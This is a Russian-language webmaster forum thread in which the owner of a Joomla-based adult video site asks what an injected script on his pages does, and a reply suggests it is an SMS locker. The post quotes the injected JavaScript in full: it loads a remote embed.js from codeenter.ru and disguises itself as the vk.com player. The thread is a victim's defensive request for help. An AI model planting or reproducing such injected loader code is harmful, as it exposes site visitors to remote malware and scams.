С нами с 03.07.13
Сообщения: 7
Рейтинг: 6
|
Добавлено: 05/07/13 в 03:15 |
Оффтопик: Постинг ссылок разрешен только по достижению 30 постингов или 30 дней с момента регистрации
Добрый день друзья! С огромным уважением обращаюсь к вам за помощью и разъяснениями. Пишу на этом форуме впервые, поэтому не обессудьте, если что не так. У меня есть сайт (ему 5 месяцев), полностью предназначенный для просмотра видео в режиме онлайн для взрослых, сделанный на движке joomla. На нем 18 категорий. Вчера, зайдя в категорию "Скрытая камера" при открытии любой страницы с выбранным роликом антивирус начал ругаться. Сначала не вкурил что за фигня, но открыв HTML страницу в браузере увидел, что в каждой станице после тега <H1> стоит вот такая херня (короче говоря, побывала на сайте какая-то сука без моего ведома):
<script type="text/javascript">
var ecConfig = ecConfig || [];
ecConfig['sid']='3739';
ecConfig['domain']='codeenter.ru';
ecConfig['locker']='vk.com/video_ext.php';
ecConfig['time']='30';
ecConfig['theme']='vk';
(function (){
var ecs = document.createElement('script'); ecs.type = 'text/javascript'; ecs.async = true;
ecs.src = ' + ecConfig['domain'] + '/embed.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ecs, s);
})();
</script>
Файл в корне сайта .htaccess смотрю тоже изменен и напичкан различными непонятными командами. Это не первый мой порно сайт, который сделан на движке joomla. Есть успешные ресурсы, которым по 3-4 года. Но вот с таким дерьмом столкнулся только сейчас. И что самое интересное, всунули эту бяку только ко всем страницам с роликами категории "Скрытая камера". Страницы с другими роликами и категориями остались не тронуты. В этом куске скрипта вижу, что речь затрагивается о vk.com, наверно потому, что все ролики в Скрытой камере просматриваются через плееры vk.com. В остальных категориях плееров от vk.com очень мало. Уважаемые ребята, будьте добры объяснить, что выполняет этот скрипт? И что это за время в 30? Избавился мигом от всей этой фигни быстро и легко за 15 минут. Удалил полностью весь сайт на серваке и закачал свою чистую новую последнюю резервную копию. Везде сменил пароли и сейчас пока все хорошо. С другими со своими сайтами, пока не приходилось также поступать (пока не взламывались), но только сейчас понял, что совсем не зря делаю всегда резервную копию, после того как поработал на сайте.
Хотел посмотреть что за такой сайт в скрипте указан (codeenter.ru), так тут же антивирус ESET раскричался. Сайт свой не указываю в этом посте, только потому, что не хочу, чтобы многие посчитали, что я рекламирую свой ресурс. Хотя в данной проблеме, его указывать и не обязательно. Уважаемые друзья, спасибо Вам огромное за внимание. Очень жду ваших ответов и мыслей по данному скрипту. Желаю всем удачи и крепкого здоровья всем вашим близким и родным!
|
|
|
|
С нами с 28.02.12
Сообщения: 1494
Рейтинг: 234
|
Добавлено: 06/07/13 в 00:26 |
блокер какойто скорее всего смсный. пароли все смени на хостинге и не сохраняй их нигде и комп проверь. ну и кмс обнови до последней. если есть дырка то простой перезалив не поможет
|
|
|
|
С нами с 03.07.13
Сообщения: 7
Рейтинг: 6
|
Добавлено: 06/07/13 в 15:29 |
pipez привет! Пароли уже давно сменил как на хостинге так и везде. А вот на счет проверки компа это правильно, просканировал - 6 вирусов выцепил, причем очень скрытые суки оказались. После их удаления, даже комп заработал как новенький , а кмс стоит самая последняя. Взлом выяснил откуда произошел, дырку закрыл. Спасибо за ответ. но меня очень интересует все таки, что это за скрипт такой, он пытался меня перенаправить куда-то, но браузер не позволил, заблокировал и тут же антивирус Eset раскричался. Спасибо за ответ pipez.
|
|
|
|
Текстовая реклама в форме ответа Заголовок и до четырех строчек текста Длина текста до 350 символов Купить рекламу в этом месте! |